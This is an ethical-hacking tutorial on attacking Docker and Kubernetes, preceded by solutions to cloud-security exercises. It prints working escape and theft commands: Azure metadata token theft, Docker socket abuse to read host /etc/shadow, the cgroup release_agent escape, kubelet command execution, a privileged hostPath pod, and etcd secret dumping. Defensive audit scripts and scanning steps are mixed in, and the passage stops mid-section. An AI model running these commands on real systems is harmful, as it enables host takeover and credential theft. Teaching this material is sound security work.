Learn Ethical Hacking (#37) - Container Security - Docker and Kubernetes Attacks
What will I learn
- Container fundamentals for attackers -- namespaces, cgroups, and why containers are NOT virtual machines;
- Docker attacks -- escaping containers, exploiting the Docker socket, and image supply chain attacks;
- Kubernetes architecture -- the attack surface of a production cluster;
- Kubernetes exploitation -- RBAC misconfigurations, exposed API servers, etcd secrets, and pod escape;
- Container image attacks -- malicious base images, secrets baked into layers, and registry exploitation;
- Service mesh and network policy -- attacking and defending inter-container communication;
- Defense: pod security standards, network policies, image scanning, OPA/Gatekeeper, runtime security.
Requirements
- A working modern computer running macOS, Windows or Ubuntu;
- Docker installed locally;
- minikube or kind for Kubernetes lab exercises;
- The ambition to learn ethical hacking and security research.
Difficulty
- Intermediate
Curriculum (of the Learn Ethical Hacking series):
- Learn Ethical Hacking (#1) - Why Hackers Win
- Learn Ethical Hacking (#2) - Your Hacking Lab
- Learn Ethical Hacking (#3) - How the Internet Actually Works - For Attackers
- Learn Ethical Hacking (#4) - Reconnaissance - The Art of Not Being Noticed
- Learn Ethical Hacking (#5) - Active Scanning - Mapping the Attack Surface
- Learn Ethical Hacking (#6) - The AI Slop Epidemic - Why AI-Generated Code Is a Security Disaster
- Learn Ethical Hacking (#7) - Passwords - Why Humans Are the Weakest Cipher
- Learn Ethical Hacking (#8) - Social Engineering - Hacking the Human
- Learn Ethical Hacking (#9) - Cryptography for Hackers - What Protects Data (and What Doesn't)
- Learn Ethical Hacking (#10) - The Vulnerability Lifecycle - From Discovery to Patch to Exploit
- Learn Ethical Hacking (#11) - HTTP Deep Dive - Request Smuggling and Header Injection
- Learn Ethical Hacking (#12) - SQL Injection - The Bug That Won't Die
- Learn Ethical Hacking (#13) - SQL Injection Advanced - Extracting Entire Databases
- Learn Ethical Hacking (#14) - Cross-Site Scripting (XSS) - Injecting Code Into Browsers
- Learn Ethical Hacking (#15) - XSS Advanced - Bypassing Filters and CSP
- Learn Ethical Hacking (#16) - Cross-Site Request Forgery - Making Users Attack Themselves
- Learn Ethical Hacking (#17) - Authentication Bypass - Getting In Without a Password
- Learn Ethical Hacking (#18) - Server-Side Request Forgery - Making Servers Betray Themselves
- Learn Ethical Hacking (#19) - Insecure Deserialization - Code Execution via Data
- Learn Ethical Hacking (#20) - File Upload Vulnerabilities - When Users Upload Weapons
- Learn Ethical Hacking (#21) - API Security - The New Attack Surface
- Learn Ethical Hacking (#22) - Business Logic Flaws - When the Code Works But the Logic Doesn't
- Learn Ethical Hacking (#23) - Client-Side Attacks - Beyond XSS
- Learn Ethical Hacking (#24) - Content Management Systems - Hacking WordPress and Friends
- Learn Ethical Hacking (#25) - Web Application Firewalls - Bypassing the Guards
- Learn Ethical Hacking (#26) - The Full Web Pentest - Methodology and Reporting
- Learn Ethical Hacking (#27) - Bug Bounty Hunting - Getting Paid to Hack the Web
- Learn Ethical Hacking (#28) - The AI Web Attack Surface - AI Features as Vulnerabilities
- Learn Ethical Hacking (#29) - Network Sniffing - Seeing Everything on the Wire
- Learn Ethical Hacking (#30) - Wireless Network Attacks - Breaking Wi-Fi
- Learn Ethical Hacking (#31) - Privilege Escalation - Linux
- Learn Ethical Hacking (#32) - Privilege Escalation - Windows
- Learn Ethical Hacking (#33) - Active Directory Attacks - The Crown Jewels
- Learn Ethical Hacking (#34) - Pivoting and Lateral Movement - Spreading Through Networks
- Learn Ethical Hacking (#35) - Cloud Security - AWS Attack and Defense
- Learn Ethical Hacking (#36) - Cloud Security - Azure and GCP
- Learn Ethical Hacking (#37) - Container Security - Docker and Kubernetes Attacks (this post)
Solutions to Episode 36 Exercises
Exercise 1: Azure Storage + Managed Identity attack.
# Step 1: Public blob access (anonymous, no auth)
curl "https://mylab.blob.core.windows.net/public/test.txt"
# Downloaded file contents -- anonymous access confirmed
# Step 2: From inside the VM, steal Managed Identity token
curl -H "Metadata:true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
# Returns: {"access_token":"eyJ0eXAi...","expires_in":"86399",...}
# Step 3: Use token to list subscription resources
curl -H "Authorization: Bearer eyJ0eXAi..." \
"https://management.azure.com/subscriptions?api-version=2020-01-01"
# Returns full subscription list with resource groups
# Step 4: Remediation
# Disable public blob access on the storage account
az storage account update --name mylab --allow-blob-public-access false
# Scope Managed Identity to minimum required permissions
# Reader at subscription level is too broad -- restrict to specific resource group
az role assignment delete --assignee MI_PRINCIPAL_ID --role "Reader" --scope /subscriptions/SUB_ID
az role assignment create --assignee MI_PRINCIPAL_ID --role "Reader" \
--scope /subscriptions/SUB_ID/resourceGroups/specific-rg
The full attack chain demonstrates the same pattern we've seen across every cloud provider: one public access misconfiguration (the blob container) provides initial access. The metadata service (IMDS) provides credential escalation. Overly broad role assignments provide lateral movement. Each fix is independent -- disable public access on storage, restrict the Managed Identity role, enable audit logging -- and defense-in-depth means any single fix breaks a link in the chain.
Exercise 2: AzureHound relationship types (abbreviated).
Azure-specific relationships (not in on-prem SharpHound):
- AZOwns (user/SP owns Azure resource)
- AZContributor (contributor role on resource)
- AZKeyVaultContributor (can read Key Vault secrets)
- AZRunsAs (Managed Identity relationships)
- AZMemberOf (Azure AD group membership)
- AZGlobalAdmin (Global Administrator role assignment)
Top 3 dangerous misconfigs:
1. Application with high-privilege API permissions (Mail.ReadWrite.All)
2. Overprivileged Managed Identities (Contributor at subscription scope)
3. Guest users with elevated roles
Key difference vs on-prem: Azure attack paths often go through
Application Registrations and Service Principals, which have no
direct on-prem equivalent. On-prem paths chain through group
memberships and ACLs. Azure paths chain through app permissions,
role assignments, and service principal ownerships.
The fundamental insight from AzureHound is that Azure AD attack paths are structurally different from on-prem AD paths. In on-prem AD (episode 33), you chain through group memberships, delegation rights, and ACL misconfigurations. In Azure AD, you chain through application permissions, role assignments, and managed identity relationships. When you import BOTH datasets into BloodHound, the hybrid paths -- on-prem to cloud and back -- are often the most dangerous because they cross security domain boundaries that no single team typically monitors.
Exercise 3: Cloud metadata comparison table.
            AWS                    Azure                  GCP
Endpoint    169.254.169.254        169.254.169.254        metadata.google.internal
Auth        None (v1)/Token (v2)   Metadata:true header   Metadata-Flavor:Google
Creds       IAM role temp keys     OAuth access token     OAuth access token
SSRF prot   IMDSv2 (PUT+token)     Header requirement     Header requirement
Defense     Enforce IMDSv2         Managed Identity       Workload Identity Fed
Most resilient to custom-header SSRF: AWS with IMDSv2 enforced.
IMDSv2 requires a PUT request to get a session token, then uses
that token in subsequent GET requests. Even SSRF with custom headers
cannot issue the initial PUT in most cases. Azure and GCP both
fall to any SSRF that can set custom headers.
AWS with IMDSv2 enforced is the most resilient because it requires a two-step process -- a PUT to get a session token, then a GET with that token. Most SSRF vulnerabilities that allow custom headers can only issue GET or POST requests, not PUT. Azure and GCP both rely on a single required header (Metadata:true and Metadata-Flavor: Google respectively), which any SSRF that supports custom headers will bypass. The lesson: a header requirement is better than nothing (blocks basic GET-only SSRF), but a separate token-acquisition step is stronger.
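The comparison above boils down to a small truth table. Here is a minimal sketch of it in Python. It assumes a simplified model: the provider labels and the function name are hypothetical, and real deployments add further controls such as hop limits and network filtering.

```python
def ssrf_reaches_metadata(provider, can_set_headers, can_send_put):
    """Return True if an SSRF primitive with these abilities can fetch credentials.

    Simplified model of the comparison table; provider labels are hypothetical.
    """
    if provider == "aws-imdsv1":
        # IMDSv1 answers a plain GET with no special header.
        return True
    if provider == "aws-imdsv2":
        # IMDSv2 needs a PUT to obtain a session token, then a GET
        # that carries the token in a custom header.
        return can_set_headers and can_send_put
    if provider in ("azure", "gcp"):
        # A single static header (Metadata:true / Metadata-Flavor: Google).
        return can_set_headers
    raise ValueError(f"unknown provider: {provider}")


if __name__ == "__main__":
    for provider in ("aws-imdsv1", "aws-imdsv2", "azure", "gcp"):
        # A typical SSRF: custom headers allowed, but GET/POST only.
        print(provider, ssrf_reaches_metadata(provider, True, False))
```

Under this model, a header-capable but GET-only SSRF is stopped only by enforced IMDSv2, which is the point of the exercise.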
Learn Ethical Hacking (#37) - Container Security - Docker and Kubernetes Attacks
Episodes 35 and 36 covered cloud security across AWS, Azure, and GCP -- IAM privilege escalation, public storage buckets, metadata services, credential theft, and the tools that map attack paths across multi-cloud environments. You can now enumerate cloud environments with ScoutSuite and Prowler, exploit overpermissive IAM policies, steal credentials via SSRF against metadata endpoints, and understand why the shared responsibility model means most breaches are the customer's fault.
But here is the thing about modern cloud deployments: when an organization says "we're on AWS" or "we're running in Azure," what they increasingly mean is "we're running Docker containers orchestrated by Kubernetes on EKS/AKS/GKE." The actual workloads running inside those cloud environments are containerized. And containers introduce their own security model -- their own isolation boundaries, their own identity systems, their own networking, their own secret management -- layered on TOP of the cloud provider's model.
More layers means more complexity. More complexity means more misconfigurations. More misconfigurations means more attack surface. You know how this goes by now ;-)
Containers Are Not Virtual Machines
This is the single most important thing to understand about container security, and I cannot stress this enough: containers are NOT virtual machines. The mental model that most developers have -- "a container is like a lightweight VM" -- is dangerously wrong from a security perspective, and it leads to assumptions about isolation that simply do not hold.
A virtual machine has its own kernel. Its own operating system. Its own memory space. A hypervisor mediates every interaction between the guest and the host hardware. To escape a VM, you need to exploit a vulnerability in the hypervisor itself -- a genuinely hard problem (though not impossible, as Pwn2Own entries have demonstrated).
A container shares the host kernel. It uses Linux namespaces for isolation (separate PID, network, mount, user, and IPC spaces) and cgroups for resource limits (CPU, memory, I/O). The container process is just a regular process on the host, running with some restrictions applied by the kernel. There is no hypervisor. There is no separate kernel. The isolation is enforced by kernel features, not by a hardware boundary.
The security implication: if you escape a container, you are directly on the host. There is no hypervisor layer to break through. Container escape equals host compromise. And because Kubernetes clusters typically run many pods on the same node, escaping one container can give you access to every other container on that node -- plus the node itself, which likely has credentials for the Kubernetes API, cloud provider metadata, and secrets for dozens of other workloads.
# Check what kernel you're running inside a container
uname -r
# 6.1.0-18-amd64
# This is the HOST kernel -- there is no guest kernel
# Check the cgroup for the current process
cat /proc/1/cgroup
# 0::/system.slice/docker-abc123.scope
# The process lives in a cgroup controlled by Docker
# Check the namespace ID
ls -la /proc/1/ns/
# Shows: cgroup, ipc, mnt, net, pid, user, uts
# Each is a namespace restriction, NOT a VM boundary
I've seen pentest reports where the tester wrote "container isolated, no further access possible" because they treated the container like a VM. They ran a few basic commands, found they couldn't see the host filesystem, and concluded the isolation was adequate. They didn't check for mounted sockets. They didn't check for privileged mode. They didn't check for misconfigured capabilities. Container isolation is only as strong as its configuration, and the default configuration in many environments is far weaker than people assume.
The Docker Socket -- The Keys to the Kingdom
If there is one single vulnerability pattern you remember from this episode, make it this one. The Docker socket (/var/run/docker.sock) is the API endpoint that controls the Docker daemon. Whoever has access to this socket can create containers, start them, stop them, exec into them, and -- critically -- create containers with full access to the host filesystem.
The problem: developers and CI/CD pipelines routinely mount the Docker socket INTO containers. Jenkins needs to build Docker images? Mount the socket. A monitoring tool needs to inspect running containers? Mount the socket. A deployment tool needs to pull and start new containers? Mount the socket. Every one of these creates a trivial escape path:
# Check if docker.sock is mounted inside your container
ls -la /var/run/docker.sock
# srw-rw---- 1 root docker 0 May 25 /var/run/docker.sock
# If this file exists: game over
# Use the Docker API directly via curl
# List all containers on the host
curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json | python3 -m json.tool
# Create a new container with the host filesystem mounted
curl -s --unix-socket /var/run/docker.sock \
-X POST http://localhost/containers/create \
-H "Content-Type: application/json" \
-d '{"Image":"alpine","Cmd":["/bin/sh","-c","cat /hostfs/etc/shadow"],"HostConfig":{"Binds":["/:/hostfs"],"Privileged":true}}'
# Returns: {"Id":"CONTAINER_ID"}
# Start the container
curl -s --unix-socket /var/run/docker.sock \
-X POST http://localhost/containers/CONTAINER_ID/start
# Read the output -- you now have /etc/shadow from the HOST
curl -s --output - --unix-socket /var/run/docker.sock \
"http://localhost/containers/CONTAINER_ID/logs?stdout=true"
This is the same concept from episode 31 (Docker group privilege escalation on Linux) but from inside a container. The principle is identical: access to the Docker API = root on the host. The Docker socket is the API. If it's mounted inside a container, anyone with code execution in that container can escape.
Having said that, I want to make clear that mounting the Docker socket is sometimes genuinely necessary -- CI/CD systems like Jenkins really do need to build images, and the alternatives (Docker-in-Docker with --privileged, running a separate Docker daemon, using Kaniko or Buildah for rootless builds) each have their own tradeoffs. The problem is not that the socket is ever mounted -- it's that it's mounted without understanding the security implication, and without compensating controls (a restricted API proxy that exposes only the calls the tool needs, dedicated build nodes isolated from production). Note that mounting the socket read-only is not such a control: the Docker API still accepts every request over a socket mounted with :ro.
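From the defender's side, the same checks can be run against the JSON that docker inspect prints. Here is a minimal sketch. It assumes the usual inspect fields (HostConfig.Privileged, HostConfig.PidMode, HostConfig.CapAdd, Mounts[].Source); the function name and the list of flagged capabilities are my own choices, not part of any Docker tooling.

```python
import json
import sys

# Capabilities that commonly lead to container escape (illustrative, not exhaustive).
DANGEROUS_CAPS = {"SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE"}


def risky_container_settings(inspect_entry):
    """Return a list of escape-prone settings found in one `docker inspect` entry."""
    findings = []
    host_config = inspect_entry.get("HostConfig") or {}
    if host_config.get("Privileged"):
        findings.append("privileged mode")
    if host_config.get("PidMode") == "host":
        findings.append("host PID namespace")
    for cap in host_config.get("CapAdd") or []:
        # Accept both "SYS_ADMIN" and "CAP_SYS_ADMIN" spellings.
        short = cap.upper()
        if short.startswith("CAP_"):
            short = short[4:]
        if short in DANGEROUS_CAPS:
            findings.append(f"added capability {short}")
    for mount in inspect_entry.get("Mounts") or []:
        source = mount.get("Source", "")
        if source.endswith("docker.sock"):
            findings.append("docker socket mounted")
        elif source == "/":
            findings.append("host root filesystem mounted")
    return findings


if __name__ == "__main__":
    # Usage: docker inspect $(docker ps -q) | python3 this_script.py
    for entry in json.load(sys.stdin):
        print(entry.get("Name"), risky_container_settings(entry))
```

An empty list does not prove a container is safe. It only means none of the patterns covered in this episode were found.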
Container Escape via Privileged Mode
Containers started with --privileged have almost no isolation from the host. The --privileged flag essentially disables all the security restrictions that make a container a container: it grants ALL Linux capabilities, it gives access to ALL host devices, it disables AppArmor and SELinux restrictions, and it allows mounting the host filesystem:
# Check if you're running in a privileged container
cat /proc/1/status | grep CapEff
# Privileged: 000001ffffffffff (all capabilities)
# Normal: 00000000a80425fb (limited set)
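# If privileged, mount the host's root block device directly
# (the device name varies per host -- /dev/sda1 is only an example; fdisk -l lists candidates)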
mkdir /tmp/hostfs
mount /dev/sda1 /tmp/hostfs
ls /tmp/hostfs
# bin boot dev etc home lib ...
# That's the entire host filesystem
# Read sensitive host files
cat /tmp/hostfs/etc/shadow
cat /tmp/hostfs/root/.ssh/id_rsa
cat /tmp/hostfs/root/.bash_history
There's also the cgroup escape technique, which works in some privileged containers (on hosts that still use cgroup v1) even when the filesystem is not directly mountable. This exploit abuses the release_agent mechanism in cgroups to execute arbitrary commands on the host:
# Cgroup release_agent escape (requires privileged container)
# Create a temp cgroup
mkdir /tmp/cgrp
mount -t cgroup -o rdma cgroup /tmp/cgrp
mkdir /tmp/cgrp/escape
# Set up the escape
echo 1 > /tmp/cgrp/escape/notify_on_release
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Write the command to execute on the host
echo '#!/bin/sh' > /cmd
echo "id > $host_path/output" >> /cmd
chmod +x /cmd
# Trigger the escape: a short-lived shell joins the cgroup and exits,
# leaving the cgroup empty, so the kernel runs release_agent on the host
sh -c "echo \$\$ > /tmp/cgrp/escape/cgroup.procs"
# Read the output
cat /output
# uid=0(root) gid=0(root) groups=0(root)
# That's root on the HOST, not inside the container
Why does --privileged get used? The same reason "Action": "*", "Resource": "*" gets used in IAM policies (episode 35): it's the fastest way to make something work. Developer needs GPU access in a container? --privileged. Need to run systemd inside a container? --privileged. Need network debugging tools that require raw sockets? --privileged. Every one of these has a narrower solution -- specific device access, specific capabilities, specific sysctl settings -- but --privileged is one flag and it works immediately.
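To see what the CapEff bitmask from the privileged-mode check actually grants, you can decode it bit by bit. The sketch below does that, assuming the capability numbering from the Linux capability headers (bit 0 is CAP_CHOWN, bit 40 is CAP_CHECKPOINT_RESTORE); the function name is hypothetical.

```python
# Capability names indexed by bit number, following the Linux kernel's numbering.
CAPABILITIES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER",
    "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP",
    "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST",
    "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER",
    "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE",
    "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD",
    "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP",
    "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM",
    "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF",
    "CAP_CHECKPOINT_RESTORE",
]


def decode_capabilities(cap_hex):
    """Turn a CapEff hex string from /proc/<pid>/status into capability names."""
    mask = int(cap_hex, 16)
    names = []
    bit = 0
    while mask >> bit:
        if (mask >> bit) & 1:
            # Fall back to a generic label for bits newer than this table.
            names.append(CAPABILITIES[bit] if bit < len(CAPABILITIES) else f"bit{bit}")
        bit += 1
    return names


if __name__ == "__main__":
    print(decode_capabilities("00000000a80425fb"))  # the "normal" mask shown earlier
```

The "normal" mask decodes to 14 capabilities and does not include CAP_SYS_ADMIN, while the privileged mask sets all 41 bits. If a single narrow capability such as CAP_NET_ADMIN solves the problem, there is no reason to grant the rest.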
Secrets in Container Images
Docker images are layered. Every RUN, COPY, or ADD instruction in a Dockerfile creates a new layer. Here's the security problem: if a secret was added in one layer and deleted in a later layer, it still exists in the image history. Docker images are like git repositories -- nothing is truly deleted, it's just no longer visible in the current state.
# Inspect image layers -- see every command that built the image
docker history target-image:latest
# IMAGE CREATED CREATED BY SIZE
# abc123 2 days ago CMD ["python" "app.py"] 0B
# def456 2 days ago RUN rm /app/credentials.json 0B
# ghi789 2 days ago COPY credentials.json /app/ 145B
# jkl012 2 days ago RUN pip install -r requirements.txt 89.2MB
# ...
# Notice: credentials.json was COPIED and then DELETED
# The deletion layer (def456) removes it from the current view
# But the COPY layer (ghi789) still contains the file
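# Extract ALL layers and search for secrets
# (older docker save output names layers */layer.tar; newer OCI-layout output
# stores them under blobs/sha256/, so adjust the find pattern if nothing matches)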
docker save target-image:latest -o image.tar
tar xf image.tar
find . -name "layer.tar" -exec tar -tf {} \; | grep -iE "password|secret|key|token|\.env|credentials"
# Or use dive for interactive layer inspection
dive target-image:latest
# Navigate through each layer, see exactly what files were added/modified/deleted
This is not a theoretical risk. I've pulled production images from Docker Hub and found AWS access keys, database passwords, TLS private keys, and API tokens baked into layers that were supposedly cleaned up in later build steps. The correct approach is to NEVER put secrets in a Dockerfile. Build arguments are not a safe alternative for build-time secrets, because their values are visible in docker history too -- use BuildKit secret mounts (RUN --mount=type=secret) instead, or better yet, inject secrets at runtime via environment variables or a secrets manager.
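The layer search can also be scripted so it does not depend on how the layers are named inside the archive. The sketch below reads the Layers list from manifest.json in a docker save tarball and lists suspicious file names per layer. The regex and the function name are illustrative assumptions, and each layer is loaded fully into memory, which is fine for a lab but not for multi-gigabyte images.

```python
import io
import json
import re
import sys
import tarfile

# File-name patterns worth a closer look (illustrative, tune for your target).
SECRET_NAME = re.compile(
    r"password|secret|token|credentials|id_rsa|\.env$|\.pem$|\.key$", re.IGNORECASE
)


def find_secret_files(image_tar_path):
    """Return (layer, path) pairs for suspicious file names in every image layer."""
    hits = []
    with tarfile.open(image_tar_path) as image:
        manifest = json.load(image.extractfile("manifest.json"))
        for layer_name in manifest[0]["Layers"]:
            layer_bytes = image.extractfile(layer_name).read()
            with tarfile.open(fileobj=io.BytesIO(layer_bytes)) as layer:
                for member in layer.getmembers():
                    base = member.name.rsplit("/", 1)[-1]
                    # ".wh." entries are whiteouts: markers that a later layer
                    # deleted a file, not the file itself.
                    if base.startswith(".wh."):
                        continue
                    if member.isfile() and SECRET_NAME.search(member.name):
                        hits.append((layer_name, member.name))
    return hits


if __name__ == "__main__":
    # Usage: docker save target-image:latest -o image.tar && python3 this_script.py image.tar
    for layer, path in find_secret_files(sys.argv[1]):
        print(f"{layer}: {path}")
```

A hit in an early layer combined with a whiteout in a later one is exactly the "copied, then deleted" pattern from the docker history output above.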
Trivy and Grype scan images for known vulnerabilities in installed packages, and Trivy can also detect common secret patterns in image layers:
# Scan an image for vulnerabilities AND secrets
trivy image --scanners vuln,secret nginx:latest
# Shows CVEs by severity + any detected secrets in layers
# Compare vulnerability counts across image variants
trivy image nginx:latest # Debian-based, many packages
trivy image nginx:alpine # Alpine-based, minimal packages
trivy image nginx:1.25-alpine # Pinned version, minimal packages
# Alpine variants typically have 80-90% fewer vulnerabilities
# because they contain fewer installed packages to have CVEs in
Kubernetes -- The Orchestration Attack Surface
If Docker is about running individual containers, Kubernetes (K8s) is about orchestrating thousands of them. And Kubernetes adds a MASSIVE attack surface on top of Docker. A K8s cluster has:
- API Server (port 6443) -- the control plane, manages everything
- etcd (port 2379) -- the database storing ALL cluster state including secrets
- kubelet (port 10250) -- agent on each node, runs pods
- kube-proxy -- handles network routing between services
- Pods, Services, Secrets, ConfigMaps, ServiceAccounts -- all your targets
Every one of these components is a potential attack vector when misconfigured. And Kubernetes misconfiguration is extremely common because the default settings are designed for ease of getting started, not for security. Sound familiar? It's the same pattern as cloud IAM policies (episode 35), Azure AD tenant defaults (episode 36), and basically every other system we've covered in this entire series.
Exposed API Server
The Kubernetes API server is the front door to the entire cluster. If it's accessible from the internet without authentication (or with anonymous auth enabled), you can read every secret, create pods, modify deployments, and effectively own the entire cluster:
# Check if the API server is accessible without auth
curl -k https://TARGET:6443/api
# If returns JSON with "kind":"APIVersions" -- API is exposed
# List all namespaces
curl -k https://TARGET:6443/api/v1/namespaces
# Read ALL secrets in ALL namespaces (the jackpot)
curl -k https://TARGET:6443/api/v1/secrets
# Returns base64-encoded secrets for every service in the cluster
# Database passwords, API keys, TLS certificates, service tokens
# If kubectl is available:
kubectl --server=https://TARGET:6443 --insecure-skip-tls-verify \
get secrets --all-namespaces -o json
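A fully open API server is rare in modern clusters. Since K8s 1.6, anonymous requests are still accepted by default, but they are mapped to the system:anonymous user, and default RBAC grants that identity little beyond health and version endpoints. Real exposure appears when someone binds a powerful role to system:anonymous or system:unauthenticated, or runs the API server with AlwaysAllow authorization. That still shows up in test environments that get promoted to production, in clusters deployed with permissive Ansible/Terraform templates, and in managed Kubernetes services where the admin assumed "private network" meant "secure."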
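The secrets returned by the API are base64-encoded, so the last step is decoding them. Here is a minimal sketch that takes the JSON from the kubectl command above (a Secret list with an items array) and returns readable values. The function name is hypothetical.

```python
import base64
import json
import sys


def decode_secrets(secret_list):
    """Map 'namespace/name' to a dict of decoded key/value pairs."""
    decoded = {}
    for item in secret_list.get("items", []):
        meta = item["metadata"]
        key = f"{meta['namespace']}/{meta['name']}"
        decoded[key] = {
            # Values are base64 in API output; binary data is shown with
            # replacement characters rather than raising an error.
            name: base64.b64decode(value).decode("utf-8", errors="replace")
            for name, value in (item.get("data") or {}).items()
        }
    return decoded


if __name__ == "__main__":
    # Usage: kubectl get secrets --all-namespaces -o json | python3 this_script.py
    for secret, values in decode_secrets(json.load(sys.stdin)).items():
        print(secret, values)
```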
Kubelet API -- Direct Pod Execution
The kubelet runs on every node and manages the pods on that node. Its API (port 10250) lets you list pods and execute commands inside them. If the kubelet API is exposed without authentication, you can execute commands in ANY pod on that node:
# Check if kubelet API is accessible
curl -k https://NODE_IP:10250/pods
# Returns JSON listing every pod on this node
# Execute a command in a specific pod
curl -k -X POST \
"https://NODE_IP:10250/run/NAMESPACE/POD_NAME/CONTAINER_NAME" \
-d "cmd=cat /etc/shadow"
# Enumerate all pods and look for interesting containers
curl -k https://NODE_IP:10250/pods | python3 -c "
import sys,json
pods = json.load(sys.stdin)['items']
for pod in pods:
    ns = pod['metadata']['namespace']
    name = pod['metadata']['name']
    for c in pod['spec']['containers']:
        print(f'{ns}/{name}/{c[\"name\"]}')
"
This is often more useful than the API server attack because even clusters with properly secured API servers sometimes leave the kubelet API open. Network policies (if they exist at all) typically focus on pod-to-pod communication, not on restricting access to the kubelet port.
RBAC Misconfigurations -- The Cloud IAM Parallel
Kubernetes has its own role-based access control system, and it suffers from the same problems as cloud IAM. The most common RBAC misconfigurations:
# From inside a pod, check what your service account can do
kubectl auth can-i --list
# If you see: Resources: [*], Verbs: [*]
# That's cluster-admin -- you own the cluster
# Common misconfigurations:
# 1. Default service account with cluster-admin
# 2. Wildcard permissions: verbs=["*"] resources=["*"]
# 3. Ability to create pods (= ability to escape to the node)
# 4. Access to secrets in other namespaces
# 5. Permission to exec into pods (= code execution everywhere)
# If you can create pods, create a privileged one:
cat <<'EOF' | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: pwned
spec:
  containers:
  - name: pwn
    image: alpine
    command: ["/bin/sh", "-c", "sleep 999999"]
    securityContext:
      privileged: true
    volumeMounts:
    - name: hostfs
      mountPath: /hostfs
  volumes:
  - name: hostfs
    hostPath:
      path: /
  automountServiceAccountToken: false
EOF
kubectl exec -it pwned -- chroot /hostfs /bin/bash
# Root on the node
The create pods permission in Kubernetes is equivalent to iam:PassRole in AWS (episode 35) or iam.serviceAccounts.actAs in GCP (episode 36). It sounds innocuous -- "allow this service account to create pods." But a pod can mount the host filesystem, run as privileged, mount any secret in the namespace it is created in, and use the node's cloud provider credentials via the metadata service. The ability to create a pod IS the ability to own the node. And by extension, if the node has access to the cloud metadata service (which it almost always does), creating a pod is a path to cloud account compromise.
This is the layering problem in action: Kubernetes RBAC sits on top of cloud IAM, which sits on top of Linux permissions. A single misconfiguration in the Kubernetes layer cascades through Docker isolation and into the cloud layer beneath it.
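The misconfigurations listed above can be spotted mechanically in Role and ClusterRole objects. The following is a minimal sketch that inspects the rules array of one role as returned by kubectl get clusterroles -o json. The function name and the finding labels are my own, and it ignores apiGroups and resourceNames for brevity.

```python
def dangerous_rules(role):
    """Return the risky permissions granted by one Role/ClusterRole dict."""
    findings = []

    def note(text):
        if text not in findings:
            findings.append(text)

    for rule in role.get("rules") or []:
        resources = set(rule.get("resources") or [])
        verbs = set(rule.get("verbs") or [])
        any_resource = "*" in resources
        any_verb = "*" in verbs
        if any_resource and any_verb:
            note("wildcard verbs on wildcard resources")
        if (any_resource or "pods" in resources) and (any_verb or "create" in verbs):
            note("can create pods")
        if (any_resource or "secrets" in resources) and (
            any_verb or verbs & {"get", "list", "watch"}
        ):
            note("can read secrets")
        if (any_resource or "pods/exec" in resources) and (any_verb or "create" in verbs):
            note("can exec into pods")
    return findings


if __name__ == "__main__":
    cluster_admin_like = {"rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]}
    print(dangerous_rules(cluster_admin_like))
```

Keep in mind that permission to create Deployments, Jobs, or DaemonSets also results in pods being created, so a fuller audit would flag those resources as well.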
Secrets from etcd -- The Cluster's Crown Jewels
etcd is the key-value store that backs the entire Kubernetes cluster. Every piece of cluster state -- every pod definition, every secret, every config map, every role binding -- lives in etcd. If you can access etcd directly, you can read (and modify) everything:
# If etcd is accessible (port 2379, no client cert required)
# List all secret keys
ETCDCTL_API=3 etcdctl --endpoints=https://TARGET:2379 \
--insecure-skip-tls-verify --insecure-transport \
get /registry/secrets --prefix --keys-only
# Read a specific secret
ETCDCTL_API=3 etcdctl --endpoints=https://TARGET:2379 \
--insecure-skip-tls-verify --insecure-transport \
get /registry/secrets/default/my-secret
# Secrets in etcd are base64-encoded by default, NOT encrypted
# Unless encryption-at-rest is explicitly configured
echo "BASE64_VALUE_HERE" | base64 -d
The encryption-at-rest situation for Kubernetes secrets is remarkably similar to the ntds.dit problem in on-prem AD (episode 33), where a single file contains all domain password hashes. etcd IS the ntds.dit of Kubernetes. By default, secrets in etcd are stored without encryption -- the base64 you see when you read a secret is encoding, NOT encryption. Anyone with access to etcd can read every secret in the cluster. Encryption at rest is available and documented, but it requires explicit configuration and many clusters don't have it enabled.
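Whether encryption at rest is active can be read off the raw value stored in etcd. The sketch below relies on two assumptions: values written through an encryption provider start with a k8s:enc:<provider>: prefix (the Kubernetes documentation uses this prefix to verify the setup), and unencrypted objects start with the k8s protobuf marker. The function name is hypothetical.

```python
def storage_state(raw_value: bytes) -> str:
    """Classify a raw etcd value under /registry/secrets/..."""
    if raw_value.startswith(b"k8s:enc:"):
        # Layout assumed: k8s:enc:<provider>:<version>:<key name>:<ciphertext>
        provider = raw_value.split(b":", 3)[2].decode("ascii", errors="replace")
        return f"encrypted ({provider})"
    if raw_value.startswith(b"k8s\x00"):
        # Plain protobuf-serialized object: secret values are readable.
        return "plaintext"
    return "unknown"


if __name__ == "__main__":
    print(storage_state(b"k8s:enc:aescbc:v1:key1:\x8f\x02..."))
    print(storage_state(b"k8s\x00\n\x0c\n\x02v1\x12\x06Secret"))
```

If every secret you sample comes back as plaintext, anyone who can read etcd, or a backup of its data directory, can read the cluster's secrets.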
Container Image Supply Chain
The supply chain attack surface for containers is enormous. Docker Hub hosts millions of images, and developers pull them without thinking twice. A malicious or compromised base image affects every container built on top of it:
# Pull an image and scan for vulnerabilities
trivy image nginx:latest
